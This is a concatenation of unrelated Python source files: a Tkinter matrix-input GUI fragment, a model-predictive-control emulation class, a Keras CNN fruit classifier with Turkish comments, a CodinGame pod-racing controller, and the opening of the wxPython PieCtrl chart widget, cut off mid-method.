        elif self.NFilas.get()=='3' and self.NColumnas.get()=='2':
            self.C11(),self.C12(),self.L13(),self.L14(),self.L15()
            self.C21(),self.C22(),self.L23(),self.L24(),self.L25()
            self.C31(),self.C32(),self.L33(),self.L34(),self.L35()
            self.L41(),self.L42(),self.L43(),self.L44(),self.L45()
            self.L51(),self.L52(),self.L53(),self.L54(),self.L55()
        elif self.NFilas.get()=='3' and self.NColumnas.get()=='3':
            self.C11(),self.C12(),self.C13(),self.L14(),self.L15()
            self.C21(),self.C22(),self.C23(),self.L24(),self.L25()
            self.C31(),self.C32(),self.C33(),self.L34(),self.L35()
            self.L41(),self.L42(),self.L43(),self.L44(),self.L45()
            self.L51(),self.L52(),self.L53(),self.L54(),self.L55()
        elif self.NFilas.get()=='3' and self.NColumnas.get()=='4':
            self.C11(),self.C12(),self.C13(),self.C14(),self.L15()
            self.C21(),self.C22(),self.C23(),self.C24(),self.L25()
            self.C31(),self.C32(),self.C33(),self.C34(),self.L35()
            self.L41(),self.L42(),self.L43(),self.L44(),self.L45()
            self.L51(),self.L52(),self.L53(),self.L54(),self.L55()
        elif self.NFilas.get()=='3' and self.NColumnas.get()=='5':
            self.C11(),self.C12(),self.C13(),self.C14(),self.C15()
            self.C21(),self.C22(),self.C23(),self.C24(),self.C25()
            self.C31(),self.C32(),self.C33(),self.C34(),self.C35()
            self.L41(),self.L42(),self.L43(),self.L44(),self.L45()
            self.L51(),self.L52(),self.L53(),self.L54(),self.L55()
        elif self.NFilas.get()=='4' and self.NColumnas.get()=='2':
            self.C11(),self.C12(),self.L13(),self.L14(),self.L15()
            self.C21(),self.C22(),self.L23(),self.L24(),self.L25()
            self.C31(),self.C32(),self.L33(),self.L34(),self.L35()
            self.C41(),self.C42(),self.L43(),self.L44(),self.L45()
            self.L51(),self.L52(),self.L53(),self.L54(),self.L55()
        elif self.NFilas.get()=='4' and self.NColumnas.get()=='3':
            self.C11(),self.C12(),self.C13(),self.L14(),self.L15()
            self.C21(),self.C22(),self.C23(),self.L24(),self.L25()
            self.C31(),self.C32(),self.C33(),self.L34(),self.L35()
            self.C41(),self.C42(),self.C43(),self.L44(),self.L45()
            self.L51(),self.L52(),self.L53(),self.L54(),self.L55()
        elif self.NFilas.get()=='4' and self.NColumnas.get()=='4':
            self.C11(),self.C12(),self.C13(),self.C14(),self.L15()
            self.C21(),self.C22(),self.C23(),self.C24(),self.L25()
            self.C31(),self.C32(),self.C33(),self.C34(),self.L35()
            self.C41(),self.C42(),self.C43(),self.C44(),self.L45()
            self.L51(),self.L52(),self.L53(),self.L54(),self.L55()
        elif self.NFilas.get()=='4' and self.NColumnas.get()=='5':
            self.C11(),self.C12(),self.C13(),self.C14(),self.C15()
            self.C21(),self.C22(),self.C23(),self.C24(),self.C25()
            self.C31(),self.C32(),self.C33(),self.C34(),self.C35()
            self.C41(),self.C42(),self.C43(),self.C44(),self.C45()
            self.L51(),self.L52(),self.L53(),self.L54(),self.L55()
        elif self.NFilas.get()=='5' and self.NColumnas.get()=='2':
            self.C11(),self.C12(),self.L13(),self.L14(),self.L15()
            self.C21(),self.C22(),self.L23(),self.L24(),self.L25()
            self.C31(),self.C32(),self.L33(),self.L34(),self.L35()
            self.C41(),self.C42(),self.L43(),self.L44(),self.L45()
            self.C51(),self.C52(),self.L53(),self.L54(),self.L55()
        elif self.NFilas.get()=='5' and self.NColumnas.get()=='3':
            self.C11(),self.C12(),self.C13(),self.L14(),self.L15()
            self.C21(),self.C22(),self.C23(),self.L24(),self.L25()
            self.C31(),self.C32(),self.C33(),self.L34(),self.L35()
            self.C41(),self.C42(),self.C43(),self.L44(),self.L45()
            self.C51(),self.C52(),self.C53(),self.L54(),self.L55()
        elif self.NFilas.get()=='5' and self.NColumnas.get()=='4':
            self.C11(),self.C12(),self.C13(),self.C14(),self.L15()
            self.C21(),self.C22(),self.C23(),self.C24(),self.L25()
            self.C31(),self.C32(),self.C33(),self.C34(),self.L35()
            self.C41(),self.C42(),self.C43(),self.C44(),self.L45()
            self.C51(),self.C52(),self.C53(),self.C54(),self.L55()
        elif self.NFilas.get()=='5' and self.NColumnas.get()=='5':
            self.C11(),self.C12(),self.C13(),self.C14(),self.C15()
            self.C21(),self.C22(),self.C23(),self.C24(),self.C25()
            self.C31(),self.C32(),self.C33(),self.C34(),self.C35()
            self.C41(),self.C42(),self.C43(),self.C44(),self.C45()
            self.C51(),self.C52(),self.C53(),self.C54(),self.C55()

    def IniciarCeros(self): # Fill every matrix entry box with zeros
        self.A11.set('0'),self.A12.set('0'),self.A13.set('0'),self.A14.set('0'),self.A15.set('0'),self.A16.set('0'),self.A17.set('0')
        self.A21.set('0'),self.A22.set('0'),self.A23.set('0'),self.A24.set('0'),self.A25.set('0'),self.A26.set('0'),self.A27.set('0')
        self.A31.set('0'),self.A32.set('0'),self.A33.set('0'),self.A34.set('0'),self.A35.set('0'),self.A36.set('0'),self.A37.set('0')
        self.A41.set('0'),self.A42.set('0'),self.A43.set('0'),self.A44.set('0'),self.A45.set('0'),self.A46.set('0'),self.A47.set('0')
        self.A51.set('0'),self.A52.set('0'),self.A53.set('0'),self.A54.set('0'),self.A55.set('0'),self.A56.set('0'),self.A57.set('0')
import logging
import abc
import time
import copy
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from mshoot.mshoot import MShoot
class MPCEmulation():
    """
    MPC emulation is used to test an MPC strategy in a simulated
    environment. Two models are required: (1) control model,
    (2) emulation model.

    The control model is used in the optimization.
    The emulation model is the virtual mock-up of the real system.

    The cost function should return a scalar and have
    the following signature:

    .. code::

        def cost(xdf, ydf):
            # user code here
            return cost

    where xdf is the state data frame and ydf is the output
    data frame.

    :param emumod: SimModel, emulation model
    :param cfun: user cost function
    """

    def __init__(self, emumod, cfun):
        self.log = logging.getLogger('MPCEmulation')
        self.log.info('Instantiate MPCEmulation')
        # Emulation model
        self.emumod = emumod
        # User cost function
        self.cost_user = cfun
        # Widen pandas printing so the debug logs below show all columns
        pd.set_option('display.max_columns', 50)

    def optimize(self, model, inp_ctr, inp_emu, free, ubounds, xbounds,
                 x0, ynominal=None, maxiter=50,
                 step=1, horizon=10, inp_clb=None):
        """
        Optimize problem using progressive multiple shooting optimizations.

        `inp_ctr` and `inp_emu` have to have the same index (control
        and emulation inputs need to be aligned).

        If `inp_clb` is provided with a callback function, then it overrides
        `inp_ctr`. The function can be used to provide new inputs for each
        receding horizon, emulating in example new weather/occupancy forecasts.
        The callback function takes only one argument `index`, which is a numpy
        1D array with time steps for which the inputs have to be provided,
        e.g. if `index = [300, 600, 900, 1200]` is passed to the function,
        it should return a data frame with index `[300, 600, 900, 1200]`
        and columns for all input variables. Since `inp_ctr` is a required argument,
        for clarity it is advised to set it to `None` in cases when `inp_clb` is provided.
        See the example `examples/mpc_fmi_6.py` for how to use `inp_clb`.

        Return:
        - u - DataFrame, optimal free inputs
        - xctr - DataFrame, control states
        - xemu - DataFrame, emulation states
        - yemu - DataFrame, emulation outputs
        - uhist - list of DataFrames, optimal free inputs per MPC interval

        :param model: SimModel, control model
        :param inp_ctr: DataFrame, fixed inputs for control model, index with time
        :param inp_emu: DataFrame, fixed inputs for emulation model, index with time
        :param free: list, names of free inputs
        :param ubounds: list of tuples of floats, free input bounds
        :param xbounds: list of tuples of vectors, state bounds
        :param x0: list, initial state
        :param ynominal: list, nominal values of outputs (for regularization)
        :param maxiter: int, maximum number of iterations (default 50)
        :param step: int, MPC re-run step - number of `inp` rows (default 1)
        :param horizon: int, opt. horizon - number of `inp` rows (default 10)
        :param inp_clb: callback function, see description
        :return: u, xctr, xemu, yemu, uhist
        """
        self.log.info("**Start MPC optimization**")
        # Sanity checks
        assert len(ubounds) == len(free)
        assert len(xbounds) == len(x0)
        # NOTE(review): this branch is a no-op placeholder; ynominal is only
        # forwarded to ms.optimize() further below.
        if ynominal is not None:
            pass  # No information about model outputs passed to this method
        # Make sure x0 is ndarray
        x0 = np.array(x0).astype(float)
        # Initialize inp_ctr from callback, if provided.
        # Initialization based on inp_emu. In each MPC loop
        # pass, a portion of the inp_ctr will be
        # overwritten by the callback function.
        if inp_clb is not None:
            inp_ctr = inp_emu.copy()
        # Assert index type is int
        inp_ctr.index = inp_ctr.index.astype(int)
        inp_emu.index = inp_emu.index.astype(int)
        # Assert control and emulation input indexes as the same
        assert np.isclose(inp_ctr.index.values, inp_emu.index.values).all(), \
            "Control and emulation input indexes are not equal!"
        # Initialize optimal free inputs u (to be returned)
        t = inp_emu.index[0]  # Current time
        u = pd.DataFrame(
            index=inp_emu.index,
            columns=free,
            data=np.zeros((inp_emu.index.size, len(free))))  # Optimal free inputs
        xemu = pd.DataFrame(index=inp_emu.index)  # Emulation states
        yemu = pd.DataFrame(index=inp_emu.index)  # Emulation outputs
        xctr = pd.DataFrame(index=inp_emu.index)  # Control states
        uhist = list()  # List of optimal solutions from all intervals
        # Extend bounds if given as floats
        # (scalar bounds become constant vectors over the whole index)
        xbounds = list(xbounds)
        for i in range(len(xbounds)):
            xb = xbounds[i]
            newxb = list()
            for b in xb:
                if isinstance(b, float) or isinstance(b, int):
                    newxb.append(np.full(inp_emu.index.size, b))
                else:
                    newxb.append(b)
            xbounds[i] = newxb
        # Instantiate optimizer
        ms = MShoot(self.cost_user)
        # Start MPC loops
        # i walks the input index in increments of `step`; each pass
        # optimizes over [i, i+horizon] and advances the emulation by `step`.
        i = 0
        dt = 0
        while (i + horizon <= inp_emu.index.size):
            self.log.debug("Current MPC time: {} s".format(t))
            print("Progress: {:.1f}%".format(float(i) / inp_emu.index.size * 100.))  # TODO: To log
            # Calculate MPC re-run time step
            dt = inp_emu.index[i+step] - inp_emu.index[i]
            # Define inputs for next period
            nxt_inp_ctr = inp_ctr.iloc[i:i+horizon+1].copy()
            nxt_inp_emu = inp_emu.iloc[i:i+horizon+1].copy()
            # Overwrite control inputs using the callback function (if provided)
            if inp_clb is not None:
                index = inp_ctr.index[i:i+horizon+1]
                self.log.debug(
                    'Using inp_clb for getting new inputs. index = {}'.format(index)
                )
                nxt_inp_ctr = inp_clb(index=index)
                assert np.isclose(nxt_inp_ctr.index.values, index.values).all(), \
                    'Index of the dataframe returned by' + \
                    ' inp_clb not consistent with emulation input dataframe'
            # Slice the state bounds to the current horizon window
            nxt_xbounds = [
                (b[0][i:i+horizon+1], b[1][i:i+horizon+1]) for b in xbounds
            ]
            # Initial state: user-provided on the first pass, the latest
            # emulated state afterwards
            if i == 0:
                nxt_x0 = x0
            else:
                nxt_x0 = xemu.iloc[i].values
            uguess = u.loc[nxt_inp_ctr.index].iloc[:-1].values  # One element shorter than inp
            self.log.debug("nxt_inp_ctr:\n{}".format(nxt_inp_ctr))
            self.log.debug("nxt_xbounds:\n{}".format(nxt_xbounds))
            self.log.debug("next_x0:\n{}".format(nxt_x0))
            self.log.debug("uguess:\n{}".format(uguess))
            # Optimize
            udf, xdf = ms.optimize(
                model=model,
                inp=nxt_inp_ctr,
                free=free,
                ubounds=ubounds,
                xbounds=nxt_xbounds,
                x0=nxt_x0,
                uguess=uguess,
                ynominal=ynominal,
                join=1,  # TODO: add to arguments
                maxiter=maxiter
            )
            # Assert index type is int
            udf.index = udf.index.astype(int)
            xdf.index = xdf.index.astype(int)
            # Add udf to `uhist`
            uhist.append(udf.copy())
            # Update `u`
            u.loc[udf.index] = udf.copy()
            # Save control states to `xctr`
            if len(xctr.columns) == 0:
                # Add columns
                for c in xdf.columns:
                    xctr[c] = np.nan
            xctr.loc[xdf.index] = xdf.copy()
            # Progress emulation by `step`
            nxt_inp_emu.loc[udf.index, free] = udf[free].copy()
            nxt_inp_emu = nxt_inp_emu.dropna()  # Last row of free inp is NaN
            self.log.debug(
                "Progress emulation with...\n"
                "nxt_inp_emu=\n{}\n"
                "nxt_x0=\n{}\n".format(nxt_inp_emu, nxt_x0)
            )
            ey, ex = self.emumod.simulate(nxt_inp_emu, nxt_x0, save_state=True)
            # Assert index type is int
            # (mshoot doesn't have control over the model implementation)
            ey.index = ey.index.astype(int)  # Assert index type is int
            ex.index = ex.index.astype(int)  # Assert index type is int
            # TODO: Figure out why the following is needed
            if len(xemu.columns) == 0:
                # Add columns
                for c in ex.columns:
                    xemu[c] = np.nan
            if len(yemu.columns) == 0:
                # Add columns
                for c in ey.columns:
                    yemu[c] = np.nan
            # Save emulation results to `xemu` and `yemu`
            # Comment:
            # For unknown reason, ex.index sometimes contains elements
            # not present in xemu.index... Therefore, select intersection
            intersect = [ti for ti in ex.index if ti in xemu.index]
            xemu.loc[intersect] = ex.loc[intersect].copy()
            intersect = [ti for ti in ey.index if ti in yemu.index]
            yemu.loc[intersect] = ey.loc[intersect].copy()
            self.log.info("Updated xemu:\n{}".format(xemu))
            self.log.info("Updated xctr:\n{}".format(xctr))
            # Increase `t` and `i`
            t += dt
            i += step
        return u, xctr, xemu, yemu, uhist
|
# Libraries
from keras.models import Sequential # Layerları üzerine koyacağımız sıralı yapı, temel gibi düşünülebilir
from keras.layers import Conv2D, MaxPooling2D, Activation, Flatten, Dense, Dropout # Kullanılacak CNN layerları
from keras.preprocessing.image import ImageDataGenerator, img_to_array, load_img
import matplotlib.pyplot as plt
from glob import glob # Belirtilen dosyaları bulmaya yarar
# Datasetlerin pathleri
train_path = "C:/Users/Alican/Documents/Dersler/DL/fruits/Training/"
test_path = "C:/Users/Alican/Documents/Dersler/DL/fruits/Test/"
# Resimlerin boyutunu almak için
img = load_img(train_path + "Apple Braeburn/0_100.jpg")
x = img_to_array(img)
className = glob(train_path + "/*" ) # Classları /* ile baştan sona okur ve className arrayine yazar. len
numberOfClass = len(className) # Class sayısını verir
print("Number of Classes:", numberOfClass)
# CNN Modelini oluşturma, modelde 3 conv layerı olacak
model = Sequential() # Sıralı yapı olacağını belirttik
model.add(Conv2D(32, (3,3), input_shape = x.shape )) # Resimler 2 boyutlu olduğu için conv2d. Parantez içindeki değerler(Filtre(Feature) sayısı, konv. kernel boyutu, keras için input shape )
model.add(Activation("relu")) # Aktivasyon fonksiyonumuz relu olacak (x=<0 ise 0, değilse x)
model.add(MaxPooling2D()) # Pooling layerı
model.add(Conv2D(32, (3,3))) # Input shape sadece ilk conv layerı için gerekli
model.add(Activation("relu"))
model.add(MaxPooling2D())
model.add(Conv2D(64, (3,3)))
model.add(Activation("relu"))
model.add(MaxPooling2D())
# Fully conneceted layerı
model.add(Flatten())
model.add(Dense(1024)) # Dense layerındaki nöron sayısı
model.add(Activation("relu"))
model.add(Dropout(0.5))
# Output layerı
model.add(Dense(numberOfClass)) # Output layerında nöron sayısı class sayısına eşit olmalı
model.add(Activation("softmax"))
model.compile(loss = "categorical_crossentropy",
optimizer = "rmsprop",
metrics = ["accuracy"]) # Softmax kullandığımız için lossumuz bu.
batch_size = 32
epochs = 50
# Data Generation
'''
Datasetimizideki resim sayıları yetersiz olduğu için bu resimleri çeşitli şekilde yeniden generate ederek çeşitlilik artırılır
rescale: Normalizasyon. RGB resimleri grayscale yapar.
shear_range: Resmi rastgele şekilde çevirir
horizontal_flip: Yatay olarak çevirir
zoom: Zoom yapar
'''
train_data_generator = ImageDataGenerator(rescale = 1./255,
shear_range = 0.3,
horizontal_flip = True,
zoom_range = 0.3)
test_data_generator = ImageDataGenerator(rescale = 1./255) # Test datasıda normalize edilir
'''
flow_from_directory: Resimleri verilen path'den okur ve belirlenen generate özelliklerine göre generate eder
Resimler 100,100,3 boyutundadır. son index resmin tipini belirttiği için almaya gerek yok. boyutu [:2] ile okursak 100x100 elde ederiz
color_mode: Resimlerin tipi
class_mode : Tek class mı çok class mı var
'''
train_generator = train_data_generator.flow_from_directory(train_path,
target_size=x.shape[:2],
batch_size = batch_size,
color_mode = "rgb",
class_mode = "categorical")
test_generator = test_data_generator.flow_from_directory(test_path,
target_size=x.shape[:2],
batch_size = batch_size,
color_mode = "rgb",
class_mode = "categorical")
# Model train edilir
'''
steps_per_epoch: 1 epochta yapılması gereken batch sayısı. Normalde 400 adet resim var fakat
biz 1600 resimle eğitmek istiyoruz bu resimler image generatordan geliyor.
validation_steps: Step per epochla aynı mantık
'''
history = model.fit_generator(generator = train_generator,
steps_per_epoch = 1600 // batch_size,
epochs = epochs,
validation_data = test_generator,
validation_steps = 800 // batch_size)
# Kayıt ve plot
model.save_weights("50epoch.h5")
print(history.history.keys())
plt.plot(history.history["loss"], label = "Train Loss")
plt.plot(history.history["val_loss"], label = "Validation Loss")
plt.legend()
plt.show()
plt.figure()
plt.plot(history.history["accuracy"], label = "Train Accuracy")
plt.plot(history.history["val_accuracy"], label = "Validation Accuracy")
plt.legend()
plt.show()
'''
import json
with open("deneme.json","w") as f:
json.dump(history.history, f)
# Kayıtlı weightleri import etme
import codecs
with codecs.open("buraya dosya adı yazılır", "r", encoding = "utf-8") as f:
h = json.loads(f.read())
'''
|
import sys
import math
class Proportional:
    """A minimal proportional (P-only) controller.

    The control signal is ``gain`` times the Euclidean distance between the
    measured position and ``target``.
    """

    def __init__(self, gain, target):
        self.gain = gain
        self.target = target

    def error(self, value):
        """Return the Euclidean distance from *value* (x, y) to the target."""
        vx, vy = value
        dx = self.target[0] - vx
        dy = self.target[1] - vy
        return math.sqrt(dx * dx + dy * dy)

    def input(self, value):
        """Return the proportional control signal for position *value*."""
        return self.gain * self.error(value)
# P-controller for thrust; its target is updated to the next checkpoint
# every game tick, so it starts with no target.
thrust_controller = Proportional(0.5, None)
def floor(signal):
    """Truncate *signal* to an int and clamp it into the thrust range [20, 100]."""
    return min(100, max(20, int(signal)))
# game loop — reads one line of pod telemetry per tick from stdin and prints
# the next checkpoint as the steering target plus a clamped thrust value
# (CodinGame "Mad Pod Racing" protocol).
while True:
    # next_checkpoint_x: x position of the next check point
    # next_checkpoint_y: y position of the next check point
    # next_checkpoint_dist: distance to the next checkpoint
    # next_checkpoint_angle: angle between your pod orientation and the direction of the next checkpoint
    x, y, next_checkpoint_x, next_checkpoint_y, next_checkpoint_dist, next_checkpoint_angle = [int(i) for i in input().split()]
    # Opponent position is read to satisfy the protocol; it is unused here.
    opponent_x, opponent_y = [int(i) for i in input().split()]
    # Retarget the P-controller at the current checkpoint, derive thrust from
    # the distance error, and clamp it to the legal [20, 100] range.
    thrust_controller.target = (next_checkpoint_x, next_checkpoint_y)
    signal = floor(thrust_controller.input((x, y)))
    print("{} {} {}".format(next_checkpoint_x, next_checkpoint_y, signal))
|
# --------------------------------------------------------------------------- #
# PIECTRL Control wxPython IMPLEMENTATION
# Python Code By:
#
# Andrea Gavana, @ 31 Oct 2005
# Latest Revision: 30 Nov 2009, 17.00 GMT
#
#
# TODO List/Caveats
#
# 1. Maybe Integrate The Very Nice PyOpenGL Implementation Of A PieChart Coded
# By Will McGugan?
#
# 2. Not Tested On Other Platforms, Only On Windows 2000/XP, With Python 2.4.1
# And wxPython 2.6.1.0
#
# For All Kind Of Problems, Requests Of Enhancements And Bug Reports, Please
# Write To Me At:
#
# andrea.gavana@gmail.com
# gavana@kpo.kz
#
# Or, Obviously, To The wxPython Mailing List!!!
#
#
# End Of Comments
# --------------------------------------------------------------------------- #
"""
PieCtrl/ProgressPie are simple classes that reproduce the behavior of a pie
chart.
Description
===========
PieCtrl/ProgressPie are simple classes that reproduce the behavior of a pie
chart. They use only pure wxPython classes/methods, without external dependencies.
PieCtrl is somewhat a "static" control, that you may create in order to display
a simple pie chart on a `wx.Panel` or similar. ProgressPie tries to emulate the
behavior of `wx.ProgressDialog`, but using a pie chart instead of a gauge.
Usage
=====
An example of use of PieCtrl is as follows::
# create a simple PieCtrl with 3 sectors
mypie = PieCtrl(panel, -1, wx.DefaultPosition, wx.Size(180,270))
part = PiePart()
part.SetLabel("serieslabel_1")
part.SetValue(300)
part.SetColour(wx.Colour(200, 50, 50))
mypie._series.append(part)
part = PiePart()
part.SetLabel("series label 2")
part.SetValue(200)
part.SetColour(wx.Colour(50, 200, 50))
mypie._series.append(part)
part = PiePart()
part.SetLabel("helloworld label 3")
part.SetValue(50)
part.SetColour(wx.Colour(50, 50, 200))
mypie._series.append(part)
An example of use of ProgressPie is as follows::
# create a progresspie
MyProgressPie = ProgressPie(panel, 100, 50, -1, wx.DefaultPosition,
wx.Size(180, 200), wx.SIMPLE_BORDER)
MyProgressPie.SetBackColour(wx.Colour(150, 200, 255))
MyProgressPie.SetFilledColour(wx.Colour(255, 0, 0))
MyProgressPie.SetUnfilledColour(wx.WHITE)
MyProgressPie.SetHeight(20)
Methods and Settings
====================
With PieCtrl you can:
- Create a PieCtrl with different sectors;
- Set the sector values, colours and labels;
- Assign a legend to the PieCtrl;
- Use an image as the PieCtrl background;
- Change the vertical rotation (perspective) of the PieCtrl;
- Show/hide the segment edges.
Window Styles
=============
`No particular window styles are available for this class.`
Events Processing
=================
`No custom events are available for this class.`
License And Version
===================
PieCtrl is distributed under the wxPython license.
Latest revision: Andrea Gavana @ 30 Nov 2009, 17.00 GMT
Version 0.2
"""
#----------------------------------------------------------------------
# Beginning Of PIECTRL wxPython Code
#----------------------------------------------------------------------
import wx
from math import pi, sin, cos
#----------------------------------------------------------------------
# Class PieCtrlLegend
# This Class Handles The Legend For The Classic PieCtrl.
#----------------------------------------------------------------------
class PieCtrlLegend(wx.Window):
    """
    This class displays a legend window for the classic L{PieCtrl}.
    """
    # NOTE(review): uses ``xrange`` and ``wx.EmptyBitmap`` — classic-wxPython /
    # Python 2 era API; a Phoenix/Python 3 port would need range/wx.Bitmap.

    def __init__(self, parent, title, id=wx.ID_ANY, pos=wx.DefaultPosition,
                 size=wx.DefaultSize, style=0):
        """
        Default class constructor.

        :param `parent`: the L{PieCtrlLegend} parent;
        :param `title`: the legend title;
        :param `id`: window identifier. A value of -1 indicates a default value;
        :param `pos`: the control position. A value of (-1, -1) indicates a default position,
         chosen by either the windowing system or wxPython, depending on platform;
        :param `size`: the control size. A value of (-1, -1) indicates a default size,
         chosen by either the windowing system or wxPython, depending on platform;
        :param `style`: the window style (unused).
        """

        wx.Window.__init__(self, parent, id, pos, size, style)

        self._title = title
        self._istransparent = False   # when True, blit the parent's pixels as background
        self._horborder = 5           # horizontal padding, in pixels
        self._verborder = 5           # vertical padding, in pixels
        self._titlecolour = wx.Colour(0, 0, 127)
        self._labelcolour = wx.BLACK
        self._backcolour = wx.Colour(255, 255, 0)
        self._backgroundDC = wx.MemoryDC()
        self._parent = parent

        # Swallow erase events to avoid flicker; all painting is done in OnPaint.
        self.Bind(wx.EVT_ERASE_BACKGROUND, lambda x: None)
        self.Bind(wx.EVT_PAINT, self.OnPaint)

    def SetTransparent(self, value=False):
        """
        Toggles the legend transparency (visibility).

        :param `value`: ``True`` to set the legend as transparent, ``False`` otherwise.
        """

        self._istransparent = value
        self.Refresh()

    def RecreateBackground(self, parentdc):
        """
        Recreates the legend background.

        :param `parentdc`: an instance of `wx.DC`.
        """

        w, h = self.GetSize()
        self._background = wx.EmptyBitmap(w, h)
        self._backgroundDC.SelectObject(self._background)

        if self.IsTransparent():
            # Copy the parent's pixels under this window so the legend
            # appears see-through.
            self._backgroundDC.Blit(0, 0, w, h, parentdc, self.GetPosition().x,
                                    self.GetPosition().y)
        else:
            self._backgroundDC.SetBackground(wx.Brush(self._backcolour))
            self._backgroundDC.Clear()

        self.Refresh()

    def SetHorizontalBorder(self, value):
        """
        Sets the legend's horizontal border.

        :param `value`: the horizontal border thickness, in pixels.
        """

        self._horborder = value
        self.Refresh()

    def GetHorizontalBorder(self):
        """ Returns the legend's horizontal border, in pixels. """

        return self._horborder

    def SetVerticalBorder(self, value):
        """
        Sets the legend's vertical border.

        :param `value`: the vertical border thickness, in pixels.
        """

        self._verborder = value
        self.Refresh()

    def GetVerticalBorder(self):
        """ Returns the legend's vertical border, in pixels. """

        return self._verborder

    def SetLabelColour(self, colour):
        """
        Sets the legend label colour.

        :param `colour`: a valid `wx.Colour` object.
        """

        self._labelcolour = colour
        self.Refresh()

    def GetLabelColour(self):
        """ Returns the legend label colour. """

        return self._labelcolour

    def SetLabelFont(self, font):
        """
        Sets the legend label font.

        :param `font`: a valid `wx.Font` object.
        """

        self._labelfont = font
        self.Refresh()

    def GetLabelFont(self):
        """ Returns the legend label font. """

        return self._labelfont

    def SetBackColour(self, colour):
        """
        Sets the legend background colour.

        :param `colour`: a valid `wx.Colour` object.
        """

        self._backcolour = colour
        self.Refresh()

    def GetBackColour(self):
        """ Returns the legend background colour. """

        return self._backcolour

    def IsTransparent(self):
        """ Returns whether the legend background is transparent or not. """

        return self._istransparent

    def OnPaint(self, event):
        """
        Handles the ``wx.EVT_PAINT`` event for L{PieCtrlLegend}.

        :param `event`: a `wx.PaintEvent` event to be processed.
        """

        pdc = wx.PaintDC(self)

        # Double-buffer: draw everything into a memory DC, blit at the end.
        w, h = self.GetSize()
        bmp = wx.EmptyBitmap(w, h)
        mdc = wx.MemoryDC()
        mdc.SelectObject(bmp)

        if self.IsTransparent():
            parentdc = wx.ClientDC(self.GetParent())
            mdc.Blit(0, 0, w, h, self._backgroundDC, 0, 0)
        else:
            mdc.SetBackground(wx.Brush(self._backcolour))
            mdc.Clear()

        dy = self._verborder
        mdc.SetFont(self._labelfont)
        mdc.SetTextForeground(self._labelcolour)
        maxwidth = 0

        # One row per pie segment: a coloured bullet followed by the label.
        for ii in xrange(len(self._parent._series)):
            tw, th = mdc.GetTextExtent(self._parent._series[ii].GetLabel())
            mdc.SetBrush(wx.Brush(self._parent._series[ii].GetColour()))
            mdc.DrawCircle(self._horborder+5, dy+th/2, 5)
            mdc.DrawText(self._parent._series[ii].GetLabel(), self._horborder+15, dy)
            dy = dy + th + 3
            maxwidth = max(maxwidth, int(2*self._horborder+tw+15))

        dy = dy + self._verborder
        # Grow/shrink the legend window to fit its content.
        if w != maxwidth or h != dy:
            self.SetSize((maxwidth, dy))

        pdc.Blit(0, 0, w, h, mdc, 0, 0)
#----------------------------------------------------------------------
# Class PiePart
# This Class Handles The Legend Segments Properties, Such As Value,
# Colour And Label.
#----------------------------------------------------------------------
class PiePart(object):
    """
    A single segment of a L{PieCtrl}: bundles the segment's absolute value,
    its fill colour and its legend label.
    """

    def __init__(self, value=0, colour=wx.BLACK, label=""):
        """
        Default class constructor.

        :param `value`: the pie part value;
        :param `colour`: the pie part colour;
        :param `label`: the pie part text label.
        """

        self._value = value
        self._colour = colour
        self._label = label

    def SetLabel(self, label):
        """
        Sets the segment label.

        :param `label`: the pie part text label.
        """

        self._label = label

    def GetLabel(self):
        """ Returns the segment label. """

        return self._label

    def SetColour(self, colour):
        """
        Sets the segment colour.

        :param `colour`: a valid `wx.Colour` object.
        """

        self._colour = colour

    def GetColour(self):
        """ Returns the segment colour. """

        return self._colour

    def SetValue(self, value):
        """
        Sets the segment absolute value.

        :param `value`: a floating point number representing the L{PiePart} value.
        """

        self._value = value

    def GetValue(self):
        """ Returns the segment absolute value. """

        return self._value
#----------------------------------------------------------------------
# Class PieCtrl
# This Is The Main PieCtrl Implementation, Used Also By ProgressPie.
#----------------------------------------------------------------------
class PieCtrl(wx.Window):
    """
    PieCtrl is somewhat a "static" control, that you may create in order to display
    a simple pie chart on a `wx.Panel` or similar.
    """
    # NOTE(review): uses ``xrange``, ``wx.EmptyBitmap`` and
    # ``BeginDrawing``/``EndDrawing`` — classic-wxPython / Python 2 era API.

    def __init__(self, parent, id=wx.ID_ANY, pos=wx.DefaultPosition,
                 size=wx.DefaultSize, style=0, name="PieCtrl"):
        """
        Default class constructor.

        :param `parent`: the L{PieCtrl} parent. Must not be ``None``;
        :param `id`: window identifier. A value of -1 indicates a default value;
        :param `pos`: the control position. A value of (-1, -1) indicates a default position,
         chosen by either the windowing system or wxPython, depending on platform;
        :param `size`: the control size. A value of (-1, -1) indicates a default size,
         chosen by either the windowing system or wxPython, depending on platform;
        :param `style`: the window style (unused);
        :param `name`: the window name.
        """

        wx.Window.__init__(self, parent, id, pos, size, style, name)

        self._angle = pi/12         # vertical perspective angle, radians (0..pi/2)
        self._rotationangle = 0     # angle at which the first sector starts, radians
        self._height = 10           # thickness of the 3-D pie "side", pixels
        self._background = wx.NullBitmap
        self._canvasbitmap = wx.EmptyBitmap(1, 1)
        self._canvasDC = wx.MemoryDC()
        self._backcolour = wx.WHITE
        self._showedges = True
        self._series = []           # list of PiePart segments to draw

        # Swallow erase events to avoid flicker; painting happens in OnPaint.
        self.Bind(wx.EVT_ERASE_BACKGROUND, lambda x: None)
        self.Bind(wx.EVT_SIZE, self.OnSize)
        self.Bind(wx.EVT_PAINT, self.OnPaint)

        self.RecreateCanvas()
        self._legend = PieCtrlLegend(self, "PieCtrl", -1, wx.Point(10,10), wx.Size(100,75))

    def SetBackground(self, bmp):
        """
        Sets the L{PieCtrl} background image.

        :param `bmp`: a valid `wx.Bitmap` object.
        """

        self._background = bmp
        self.Refresh()

    def GetBackground(self):
        """ Returns the L{PieCtrl} background image. """

        return self._background

    def OnSize(self, event):
        """
        Handles the ``wx.EVT_SIZE`` event for L{PieCtrl}.

        :param `event`: a `wx.SizeEvent` event to be processed.
        """

        self.RecreateCanvas()
        self.Refresh()
        event.Skip()

    def RecreateCanvas(self):
        """ Recreates the L{PieCtrl} container (canvas). """

        self._canvasbitmap = wx.EmptyBitmap(self.GetSize().GetWidth(),
                                            self.GetSize().GetHeight())
        self._canvasDC.SelectObject(self._canvasbitmap)

    def GetPartAngles(self):
        """ Returns the angles associated to all segments. """
        # Returns len(self._series)+1 cumulative boundary angles in degrees,
        # starting at 0 and ending at 360.
        # NOTE(review): raises ZeroDivisionError if all segment values are 0.

        angles = []
        total = 0.0

        for ii in xrange(len(self._series)):
            total = total + self._series[ii].GetValue()

        current = 0.0
        angles.append(current)

        for ii in xrange(len(self._series)):
            current = current + self._series[ii].GetValue()
            angles.append(360.0*current/total)

        return angles

    def SetAngle(self, angle):
        """
